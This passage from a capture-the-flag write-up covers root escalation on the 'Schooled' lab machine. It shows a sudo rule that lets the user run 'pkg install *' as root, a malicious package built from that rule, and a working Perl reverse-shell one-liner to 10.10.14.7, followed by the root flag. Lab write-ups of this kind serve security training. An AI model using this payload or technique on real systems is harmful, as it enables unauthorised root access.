first 10 lines, use "head filename". To see new lines as they're appended
to a file, use "tail -f filename".
-- Dru <genesis@istar.ca>
jamie@Schooled:~ $ ls
user.txt
By the enumeration of privileges for the jamie
account, I’ve found out that he can run pkg install
with *
.
jamie@Schooled:~ $ sudo -l
User jamie may run the following commands on Schooled:
(ALL) NOPASSWD: /usr/sbin/pkg update
(ALL) NOPASSWD: /usr/sbin/pkg install *
By this methodology I was able to create the package. Instead of the id
command, I’ve used the reverse shell perl payload.
perl -e 'use Socket;$i="10.10.14.7";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
And this allowed me to gain the root
shell on the box!
# id
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
# ls
.cache
.cshrc
.history
.k5login
.lesshst
.login
.profile
.shrc
.ssh
root.txt
scripts
# cat root.txt
518af4d67b32bf39c4f0d07e40331cb3
# ip a
/bin/sh: ip: not found
# ipconfig
/bin/sh: ipconfig: not found
Post exploitation⌗
N/A